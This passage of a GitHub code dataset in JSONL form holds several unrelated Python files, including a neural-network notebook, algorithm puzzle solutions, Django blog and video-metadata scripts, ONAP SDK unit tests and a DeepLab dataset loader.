peças\n\nsns.distplot(DataSet['Area'].dropna(),kde=False,color='darkred',bins=30)\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='Area',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='NumAmostra',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\n\nsns.set_style('whitegrid')\nsns.countplot(x='Delta',hue='Output1',data=DataSet,palette='rainbow')\nplt.show()\n\n# ## As variáveis preditoras e a variável de resposta\n# \n# Para treinar o modelo de regressão, primeiro precisaremos dividir nossos dados em uma matriz **X** que contenha os dados das variáveis preditoras e uma matriz **y** com os dados da variável de destino.\n# \n# ### Matrizes X e y\n\n#X = DataSet[[ 'NumAmostra', 'Area', 'Delta']]\n#y = DataSet[['Output1','Output2']]\n\n# ### Relação entre as variáveis preditoras\n# \n# #### Algumas questões importantes\n# 1. Pelo menos um dos preditores ***x1, x2, ... ,x5*** é útil na previsão da resposta?\n# 2. Todos os preditores ajudam a explicar **y**, ou apenas um subconjunto dos preditores?\n# 3. Quão bem o modelo se ajusta aos dados?\n# 4. Dado um conjunto de valores de previsão, quais valores de resposta devemos prever e quais as métricas indicam um bom modelo de previsão?\n# \n# **Gráficos simples de dispersão**\n# \n# Pelos gráficos abaixo percebemos ... nossa variável de resposta\nsns.pairplot(DataSet)\nplt.show()\n\n\n# **Mapa de Calor**\n# \n# O gráfico abaixo mostra através de uma escala de cores a correlação entre as variáveis do *Dataset*. 
Se observarmos as cores deste gráfico, a variável preditora **'Area'** possui maior correlação com a variável de resposta **'Output'** e a variável **'NumAmostra'** a menor.\n\nsns.heatmap(DataSet.corr())\nplt.show()\n\n\n# ## Normalização dos Dados\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nDataScaled=scaler.fit_transform(DataSet)\nDataSetScaled=pd.DataFrame(np.array(DataScaled),columns = ['NumAmostra', 'Area', 'Delta', 'Output1','Output2'])\n\nDataSetScaled.head()\n\nX = DataSetScaled.drop(['Output1', 'Output2'],axis=1)\ny = DataSet[['Output1','Output2']]\n\n\n# ## Separando os dados de treinamento e de validação\n# \n# Agora vamos dividir os dados em um conjunto de treinamento e um conjunto de testes. Vamos treinar o modelo no conjunto de treinamento, em seguida, usar o conjunto de teste para validar o modelo.\n# \n# Em nosso exemplo iremos separar de forma randômica 33% dos dados para validação. Estes dados não serão utilizados para determinação dos coeficientes preditores do modelo. \n# \n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.29, random_state=3)\n\nprint(y_test)\nprint(X_test)\n# ## Criando o Modelo de MPL\n\n\n#Tamanho do DataSet de Treinamento\nn_records, n_features = X_train.shape\n\n#Arquitetura da MPL\nN_input = 3\nN_hidden = 8\nN_output = 2\nlearnrate = 0.1\n# ## Inicialização dos pesos da MPL (Aleatório)\n\n#Pesos da Camada Oculta (Inicialização Aleatória)\nweights_input_hidden = np.random.normal(0, scale=0.1, size=(N_input, N_hidden))\nprint('Pesos da Camada Oculta:')\nprint(weights_input_hidden)\n\n#Pesos da Camada de Saída (Inicialização Aleatória)\nweights_hidden_output = np.random.normal(0, scale=0.1, size=(N_hidden, N_output))\nprint('Pesos da Camada de Saída:')\nprint(weights_hidden_output)\n\n\n# ## Algoritmo Backpropagation\n\nepochs = 50000\nlast_loss=None\nEvolucaoError=[]\nIndiceError=[]\n\nfor e in range(epochs):\n delta_w_i_h = np.zeros(weights_input_hidden.shape)\n delta_w_h_o = np.zeros(weights_hidden_output.shape)\n for xi, yi in zip(X_train.values, y_train.values):\n \n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n #print('As saídas da rede são',output)\n#------------------------------------------- \n \n# Backward Pass\n ## TODO: Cálculo do Erro\n error = yi - output\n \n # TODO: Calcule o termo de erro de saída (Gradiente da Camada de Saída)\n output_error_term = error * output * (1 - output)\n\n # TODO: Calcule a contribuição da camada oculta para o erro\n hidden_error = np.dot(weights_hidden_output,output_error_term)\n \n # TODO: Calcule o termo de erro da camada oculta (Gradiente da Camada Oculta)\n hidden_error_term = hidden_error * hidden_layer_output * (1 - hidden_layer_output)\n \n # TODO: Calcule a variação do peso da camada de saída\n delta_w_h_o += output_error_term*hidden_layer_output[:, None]\n\n # TODO: Calcule a variação do peso da camada oculta\n delta_w_i_h += hidden_error_term * xi[:, None]\n \n #Atualização dos pesos na época em questão\n weights_input_hidden += learnrate * delta_w_i_h / n_records\n 
weights_hidden_output += learnrate * delta_w_h_o / n_records\n \n \n # Imprimir o erro quadrático médio no conjunto de treinamento\n \n if e % (epochs / 20) == 0:\n hidden_output = sigmoid(np.dot(xi, weights_input_hidden))\n out = sigmoid(np.dot(hidden_output,\n weights_hidden_output))\n loss = np.mean((out - yi) ** 2)\n\n if last_loss and last_loss < loss:\n print(\"Erro quadrático no treinamento: \", loss, \" Atenção: O erro está aumentando\")\n else:\n print(\"Erro quadrático no treinamento: \", loss)\n last_loss = loss\n \n EvolucaoError.append(loss)\n IndiceError.append(e)\n\n### Gráfico da Evolução do Erro\n\n\nplt.plot(IndiceError, EvolucaoError, 'r') # 'r' is the color red\nplt.xlabel('')\nplt.ylabel('Erro Quadrático')\nplt.title('Evolução do Erro no treinamento da MPL')\nplt.show()\n\n\n# ## Validação do modelo\n\n# Calcule a precisão dos dados de teste\nn_records, n_features = X_test.shape\npredictions=0\n\nfor xi, yi in zip(X_test.values, y_test.values):\n\n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n\n#------------------------------------------- \n \n#Cálculo do Erro da Predição\n ## TODO: Cálculo do Erro \n if (output[0]>output[1]):\n if (yi[0]>yi[1]):\n predictions+=1\n \n if (output[1]>=output[0]):\n if (yi[1]>yi[0]):\n predictions+=1\n\nprint(\"A Acurácia da Predição é de: {:.3f}\".format(predictions/n_records))\n ","repo_name":"darlanSchmitz25/IA","sub_path":"0.921.py","file_name":"0.921.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72070837287","text":"# 给你一个只包含 '(' 和 ')' 的字符串,找出最长有效(格式正确且连续)括号子串的长度。 \n# \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:s = \"(()\"\n# 输出:2\n# 解释:最长有效括号子串是 \"()\"\n# \n# \n# 示例 2: \n# \n# \n# 输入:s = \")()())\"\n# 输出:4\n# 解释:最长有效括号子串是 \"()()\"\n# \n# \n# 示例 3: \n# \n# \n# 输入:s = \"\"\n# 输出:0\n# \n# \n# \n# \n# 提示: \n# \n# \n# 0 <= s.length <= 3 * 10⁴ \n# s[i] 为 '(' 或 ')' \n# \n# \n# \n# 👍 1785 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def longestValidParentheses(self, s: str) -> int:\n \"\"\"\n 方法1:动态规划\n 思路:最值问题,思考用动态规划去解决。\n 定义dp:dp[i]表示以下标i结尾的最长有效子串长度。\n base case:\n 分析:when s[i] is '(', s[i] not in subs, so dp[i] = 0\n when s[i] is ')', should look s[i-1]:\n if s[i-1] is '(', then dp[i] = dp[i-2] + 2\n if s[i-1] is ')', if s[i-dp[i-1]-1] is '(', then dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n \"\"\"\n if not s:\n return 0\n n = len(s)\n dp = [0 for _ in range(n)]\n\n for i in range(1, n):\n if s[i] == ')':\n if s[i-1] == '(':\n dp[i] = dp[i-2] + 2 if i > 1 else 2\n elif s[i-1] == ')':\n if i-dp[i-1] > 0 and s[i-dp[i-1]-1] == '(':\n if i - dp[i-1] >= 2:\n dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n else:\n dp[i] = dp[i-1] + 2\n\n return max(dp)\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n # s = \"(()\"\n s = \")()())\"\n result = Solution().longestValidParentheses(s)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[32]最长有效括号.py","file_name":"[32]最长有效括号.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41117560602","text":"\n# reading data\nsource = open('source.txt', 'r')\n\n# writing data\noutput = open('output.txt', 'w')\n\n\ndef fibonacci_sequence(source, output):\n # getting data from source\n source_data = source.read().splitlines()\n source.close()\n\n # getting line indexes from source\n line_indexes = [source_data.index(i) + 1 for i in source_data]\n first_element = second_element = line_indexes[0]\n counter_value = 2\n\n sequence_elements = [first_element]\n\n for i in range(line_indexes[0], line_indexes[6]):\n # code for fibonacci sequence\n while counter_value < line_indexes.index(i) + 1:\n\n elements_sum = first_element + second_element\n first_element = second_element\n second_element = elements_sum\n counter_value += 1\n # adding fibonacci sequence to list\n sequence_elements.append(elements_sum)\n\n # checking for right index between sequence_elements and source_data\n for i in source_data:\n\n for element in sequence_elements:\n\n if source_data.index(i) == element-1:\n # reverse and writing data in output.txt\n output.write(i[::-1] + '\\n')\n\n output.close()\n\n return 'Data loaded successfully!'\n\n\nprint(fibonacci_sequence(source, output))\n","repo_name":"MrFlava/justforfun","sub_path":"Sparkybit_test_task-master/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35748549151","text":"'''\nhttps://boj.kr/20057\n'''\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\nleft = [(-1,-1,0.1),(1,-1,0.1),(-1,0,0.07),(1,0,0.07),(-1,1,0.01),(1,1,0.01),(0,-2,0.05),(-2,0,0.02),(2,0,0.02),(0,-1,0)]\nright = [(y,-x,z) for y,x,z in left]\ndown = [(-x,y,z) for y,x,z in left]\nup = [(x,y,z) for y,x,z in left]\n\ngrid = []\nfor _ in range(N):\n row = list(map(int,input().split()))\n grid.append(row)\n\ndef solve(cnt,dy,dx,tornado_dr):\n global res, curr_y, curr_x\n\n for _ in range(cnt):\n curr_y += dy\n curr_x += dx\n total = 0\n for _dy,_dx,ratio in tornado_dr:\n ny = curr_y + _dy\n nx = curr_x + _dx\n if ratio == 0:\n new_sand = grid[curr_y][curr_x] - total\n else:\n new_sand = int(grid[curr_y][curr_x] * ratio)\n total += new_sand\n if 0 <= ny < N and 0 <= nx < N:\n grid[ny][nx] += new_sand\n else:\n res += new_sand\n\ncurr_y,curr_x = N//2,N//2\nres = 0\nfor i in range(1,N+1):\n if i == N:\n solve(i-1,0,-1,left)\n break\n if i % 2 != 0:\n solve(i,0,-1,left)\n solve(i,1,0,down)\n else:\n solve(i,0,1,right)\n solve(i,-1,0,up)\n\nprint(res)","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/samsung/20057_마법사 상어와 토네이도.py","file_name":"20057_마법사 상어와 토네이도.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8843900932","text":"#! /usr/bin/env python\n\nimport uvmf_gen\n\n## The input to this call is the name of the desired interface\nintf = uvmf_gen.InterfaceClass('jkl')\n\n## Specify the clock and reset signal for the interface\nintf.clock = 'pjClk'\nintf.reset = 'pjRst'\n\n## Specify the ports associated with this interface.\n## addPort(,,[input|output|inout])\nintf.addPort('jkl_wdata',8,'input')\nintf.addPort('jkl_addr',16,'input')\nintf.addPort('jkl_rdata',8,'output')\n\n## Specify transaction variables for the interface.\n## addTransVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addTransVar('jkl_trnVar1','byte',isrand=False)\nintf.addTransVar('jkl_trnVar2','int',isrand=True)\nintf.addTransVar('jkl_trnVar3','bit [15:0]',isrand=False)\n\n## Specify configuration variables for the interface.\n## addConfigVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addConfigVar('jkl_cfgVar1','bit',isrand=False)\nintf.addConfigVar('jkl_cfgVar2','int',isrand=True)\nintf.addConfigVar('jkl_cfgVar3','bit [3:0]',isrand=False)\n\n## Set to 'True' if you want this interface code to be Veloce ready,\n## otherwise don't set or set to 'False'\nintf.veloceReady = True\n\n## This will prompt the creation of all interface files in their specified\n## locations\nintf.create()\n","repo_name":"muneeb-mbytes/UVMF","sub_path":"UVM_Framework/UVMF_3.6c/templates/python/examples/multi_file/jkl_if_config.py","file_name":"jkl_if_config.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"30003403170","text":"import os\nimport re\nimport sys\nimport django\nfrom datetime import datetime\nimport ffmpeg\n\n# Set up Django's settings\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ArgusAPI.settings')\ndjango.setup()\n\nfrom API.models import Video\nfrom ArgusAPI.settings import STORAGE_ROOT\n\ndef VideoMeta():\n folder_path = STORAGE_ROOT+\"/files\"\n for file_name in os.listdir(folder_path):\n if file_name.endswith(\".mp4\") or file_name.endswith(\".mov\") or file_name.endswith(\".avi\") or file_name.endswith(\".mkv\"):\n file_path = os.path.join(folder_path, file_name)\n\n # Retrieve video thumbnail\n thumbnail_path = f\"{file_name}.jpg\"\n # thumbnail_path = os.path.join(folder_path, thumbnail_filename)\n # ffmpeg.input(file_path).output(thumbnail_path, vframes=1).run()\n \n # video info\n probe = ffmpeg.probe(file_path)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n audio_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'audio'), None)\n file_size = os.path.getsize(file_path)\n file_type = video_stream.get(\"codec_name\")\n date_created = os.path.getctime(file_path)\n date_modified = os.path.getmtime(file_path)\n duration = video_stream.get(\"duration\")\n width = video_stream.get(\"width\")\n height = video_stream.get(\"height\")\n frame_rate = video_stream.get(\"avg_frame_rate\")\n audio_codec = audio_stream.get(\"codec_name\")\n audio_channels = audio_stream.get(\"channels\")\n audio_sample_rate = audio_stream.get(\"sample_rate\")\n \n video = Video(\n video_name = file_name,\n thumbnail_path = thumbnail_path,\n video_path = file_path,\n video_type = file_type,\n video_size = file_size,\n video_date_time = date_created,\n duration = duration,\n width = width,\n height = height,\n fps = frame_rate,\n audio_codec = audio_codec,\n audio_channel = audio_channels,\n audio_sample_rate = audio_sample_rate\n )\n # print\n # print(\"File name:\", file_name)\n # print(\"File type:\", file_type)\n # print(\"File size:\", file_size, \"bytes\")\n # print(\"Date created:\", datetime.fromtimestamp(date_created).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Date last modified:\", datetime.fromtimestamp(date_modified).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Duration:\", duration, \"seconds\")\n # print(\"Resolution:\", width, \"x\", height)\n # print(\"Frame rate:\", frame_rate, \"fps\")\n # print(\"Audio codec:\", audio_codec)\n # print(\"Audio channels:\", audio_channels)\n # print(\"Audio sample rate:\", audio_sample_rate, \"Hz\")\n # print(\"-----------------------------------\")\n","repo_name":"Team-Zeon/cyberx","sub_path":"ArgusAPI/API/scripts/videometadata.py","file_name":"videometadata.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"10158576463","text":"from math import sqrt \n\n\n# Fonction qui permet de determiner un rectangle dans un polygone \ndef rec(A):\n AB=sqrt((A[2]-A[0])**2+(A[3]-A[1])**2)\n AD=sqrt((A[6]-A[0])**2+(A[7]-A[1])**2)\n BC=sqrt((A[4]-A[2])**2+(A[5]-A[3])**2)\n DC=sqrt((A[4]-A[6])**2+(A[5]-A[7])**2)\n VAB=A[2]-A[0],A[3]-A[1]\n VAD=A[6]-A[0],A[7]-A[1]\n VEC=VAB[0]*VAD[0]+VAB[1]*VAD[1]\n \n if (((AB==DC) or (AD==BC) and (VEC==0))):\n return {\"Rectangle\":True}\n\n else:\n return {\"Rectangle\":False}\n\nprint(rec(A=[1,2,3,2,1,1,3,1]))\n\n","repo_name":"Manoe2006/ann-e-sco-2022-2023","sub_path":"devoir_maison_nsi.py/func_rectangle.py","file_name":"func_rectangle.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12402770833","text":"from logging import WARNING, INFO, DEBUG\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n# Set the logging level.\nlogging_level = DEBUG\n\n# Configure the Chrome settings.\nuser_data_dir = r\"C:\\works\\_tools\\selenium\\chrome\\User Data\"\nprofile_dir = r\"Default\"\ndownload_dir = r\"C:\\works\\_tools\\selenium\\chrome\\Downloads\"\n\n# Define the sequences of Ausrine.\nsequences = [\n {\"get\": {\"url\": \"https://www.google.com/?hl=en\"}},\n {\"click\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \"iphone\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \" 14\", \"append\": True}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": Keys.ENTER}},\n]\n","repo_name":"naoyoshinori/ausrine_example","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72616264808","text":"from django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n# Create your views here.\nfrom .models import Post\n\n\ndef post_list(request):\n # html = render_to_string('blog/post_list.html')\n # posts = Post.objects.all()\n #\n # result = 'index '\n #\n # for post in posts:\n # result += f'-{post} '\n #\n # # return HttpResponse(result)\n # return HttpResponse(result)\n # render는 주어진 1,2 번째 인수를 사용해서\n # 1번째인수 : HttpRequests 인스턴스\n # 2번째인수 : 문자열(TEMPLATE['DIRS']를 기준으로 탐색할 템플릿 파일의 경로\n # return render\n posts = Post.objects.all().order_by('-id')\n context = {\n 'posts': posts,\n }\n return render(request, 'blog/post_list.html', context)\n\n\ndef post_detail(requset, post_id):\n post = Post.objects.get(id=post_id)\n context = {\n 'post': post,\n }\n\n # post_detail view function 이 ��바르게 동작하는 html을 작성해 오세요\n # post_detail.html 파일을 만들어서 post.id 값을 할당하여 해당 페이지로 넘겨주기\n return render(requset, 'blog/post_detail.html', context)\n\n\ndef post_create(request):\n # title\n # text\n # title = Post.objects.create(title=)\n # text = Post.objects.create(text=)\n context = {\n\n }\n print(request.POST.get('title'))\n print(request.POST.get('content'))\n if request.method == 'POST':\n # request의 method 값이 'POST' 일 경우\n # request.POST에 있는 title, text 값과\n # request.user 에 있는 User 인스턴스 속성을 사용해서\n # 세 post 인스턴스를 생성\n # HttpResponse를 사용해 새로생성된 인스턴스의 id, title, text 정보를 출력\n post = Post.objects.create(\n author=request.user,\n title=request.POST['title'],\n text=request.POST['content'],\n\n )\n # HTTP Redirection을 보낼 URL\n # http://localhost:8000/\n return redirect('post-list')\n else:\n return render(request, 'blog/post_create.html', context)\n\n\ndef post_delete(request, post_id):\n if request.method == 'POST':\n post = Post.objects.get(id=post_id)\n post.delete()\n return redirect('post-list')\n\n\ndef post_edit(request, post_id):\n post = Post.objects.get(id=post_id)\n\n if request.method == 'POST':\n pass\n # 글을 수정하기\n # 1. 수정할 내용(title, text)을 가져온다\n # 2. 수정할 Post 인스턴스 명시\n # 3. 해당하는 Post 인스턴스의 title, text 를 수정해서 DB에 저장\n # 4. post_detail로 이동\n title = request.POST['title']\n text = request.POST['content']\n\n # 수정해서 DB에 저장\n post.title = title\n post.text = text\n post.save()\n # return HttpResponseRedirect('/{}/'.format(post_id))\n # post-detail에 해당하는 URL 을 만들어 내려면,\n # (\\d+)에 해당하는 부분을 채울 값이 함께 필요\n return redirect('post-detail', post_id)\n # POST 방식이라면 어차피 위에서 return 되므로ㅓ else문 생략\n context = {\n 'post':post,\n }\n return render(request, 'blog/post_edit.html', context)\n","repo_name":"bear-engineer/Python-django-tutorial","sub_path":"app/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16535934417","text":"from unittest import mock\n\nfrom onapsdk.aai.cloud_infrastructure import Complex\nfrom onapsdk.aai.cloud_infrastructure import CloudRegion\n\n\nCOMPLEXES = {\n \"complex\":[\n {\n \"physical-location-id\":\"integration_test_complex\",\n \"data-center-code\":\"1234\",\n \"complex-name\":\"integration_test_complex\",\n \"identity-url\":\"\",\n \"resource-version\":\"1588244056133\",\n \"physical-location-type\":\"\",\n \"street1\":\"\",\n \"street2\":\"\",\n \"city\":\"\",\n \"state\":\"\",\n \"postal-code\":\"\",\n \"country\":\"\",\n \"region\":\"\",\n \"latitude\":\"\",\n \"longitude\":\"\",\n \"elevation\":\"\",\n \"lata\":\"\",\n \"time-zone\":\"\",\n \"data-owner\":\"\",\n \"data-source\":\"\",\n \"data-source-version\":\"\"\n }\n ]\n}\n\n\nCOMPLEXES_COUNT = {\n \"results\":[\n {\n \"complex\":12\n }\n ]\n}\n\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex(mock_send_message):\n cmplx = Complex(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n assert cmplx.name == \"test_complex_name\"\n assert cmplx.physical_location_id == \"test_location_id\"\n assert cmplx.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n cmplx2 = Complex.create(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx2.name == \"test_complex_name\"\n assert cmplx2.physical_location_id == \"test_location_id\"\n assert cmplx2.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PUT\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex_update(mock_send_message):\n cmplx1 = Complex.update(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx1.name == \"test_complex_name\"\n assert cmplx1.physical_location_id == \"test_location_id\"\n assert cmplx1.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PATCH\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_all(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES\n complexes = list(Complex.get_all())\n assert len(complexes) == 1\n cmplx = complexes[0]\n assert cmplx.name == \"integration_test_complex\"\n assert cmplx.physical_location_id == \"integration_test_complex\"\n\n\n@mock.patch.object(CloudRegion, \"add_relationship\")\n@mock.patch.object(CloudRegion, \"relationships\", new_callable=mock.PropertyMock)\n@mock.patch.object(CloudRegion, \"delete_relationship\")\ndef test_cloud_region_link_to_complex(mock_delete_relationship, mock_relationships, mock_add_rel):\n \"\"\"Test Cloud Region linking with Complex.\n\n Test Relationship object creation\n \"\"\"\n cloud_region = CloudRegion(cloud_owner=\"test_cloud_owner\",\n cloud_region_id=\"test_cloud_region\",\n orchestration_disabled=True,\n in_maint=False)\n cmplx = Complex(name=\"test_complex_name\",\n 
physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cloud_region.link_to_complex(cmplx)\n mock_add_rel.assert_called_once()\n relationship = mock_add_rel.call_args[0][0]\n assert relationship.related_to == \"complex\"\n assert relationship.related_link == (f\"https://aai.api.sparky.simpledemo.onap.org:30233/aai/\"\n f\"v27/cloud-infrastructure/complexes/complex\"\n f\"/test_location_id\")\n assert len(relationship.relationship_data) == 1\n\n mock_relationships.return_value = [relationship]\n cloud_region.unlink_complex(cmplx)\n mock_delete_relationship.assert_called_once_with(relationship)\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_by_physical_location_id(mock_send_message_json):\n \"\"\"Test complex get_by_physical_location_id url creation.\"\"\"\n Complex.get_by_physical_location_id(\"test\")\n mock_send_message_json.assert_called_once_with(\n \"GET\",\n \"Get complex with physical location id: test\",\n f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n f\"complexes/complex/test\"\n )\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex_delete(mock_send_message):\n cmplx = Complex(physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cmplx.delete()\n mock_send_message.assert_called_once_with(\n \"DELETE\",\n \"Delete test_location_id complex\",\n f\"{cmplx.url}?resource-version={cmplx.resource_version}\"\n )\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_count(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES_COUNT\n assert Complex.count() == 12\n","repo_name":"onap/integration-python-onapsdk","sub_path":"tests/test_aai_complex.py","file_name":"test_aai_complex.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"39752904711","text":"import sys\nsys.path.append('..')\nfrom utils import param_file_access\nimport tensorflow as tf\n\nslim = tf.contrib.slim\ndataset = slim.dataset\ntfexample_decoder = slim.tfexample_decoder\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n\n\n\n_ITEMS_TO_DESCRIPTIONS = {\n 'image': 'A color image of varying height and width.',\n 'labels_class': ('A semantic segmentation label whose size matches image.'\n 'Its values range from 0 (background) to num_classes.'),\n}\n\n\n\n\n\ndef get_dataset(list_path, tfrecord_path, label_map_path, ignore_label=255):\n \"\"\"Gets an instance of slim Dataset.\n\n Args:\n list_path: Path of sample list file.\n tfrecord_path: Tfrecord file path corresponding to list.\n label_map_path: Path of sample label map file.\n\n Returns:\n An instance of slim Dataset.\n\n \"\"\"\n \n num_samples = len(param_file_access.get_txt_params(list_path))\n num_classes = len(param_file_access.get_json_params(label_map_path))\n\n\n # Specify how the TF-Examples are decoded.\n keys_to_features = {\n 'image/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/filename': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/format': tf.FixedLenFeature(\n (), tf.string, default_value='jpeg'),\n 'image/height': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/width': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/segmentation/class/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/segmentation/class/format': tf.FixedLenFeature(\n (), tf.string, default_value='png'),\n }\n items_to_handlers = {\n 'image': tfexample_decoder.Image(\n image_key='image/encoded',\n format_key='image/format',\n channels=3),\n 'image_name': tfexample_decoder.Tensor('image/filename'),\n 'height': tfexample_decoder.Tensor('image/height'),\n 'width': tfexample_decoder.Tensor('image/width'),\n 'labels_class': tfexample_decoder.Image(\n image_key='image/segmentation/class/encoded',\n format_key='image/segmentation/class/format',\n channels=1),\n }\n\n decoder = tfexample_decoder.TFExampleDecoder(\n keys_to_features, items_to_handlers)\n\n return dataset.Dataset(\n data_sources=tfrecord_path,\n reader=tf.TFRecordReader,\n decoder=decoder,\n num_samples=num_samples,\n items_to_descriptions=_ITEMS_TO_DESCRIPTIONS,\n num_classes=num_classes,\n ignore_label=ignore_label,\n name='pascal_voc_seg',\n multi_label=True)\n","repo_name":"KoapT/tf_train","sub_path":"projects/deeplab_v3plus/src/datasets/segmentation_dataset.py","file_name":"segmentation_dataset.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
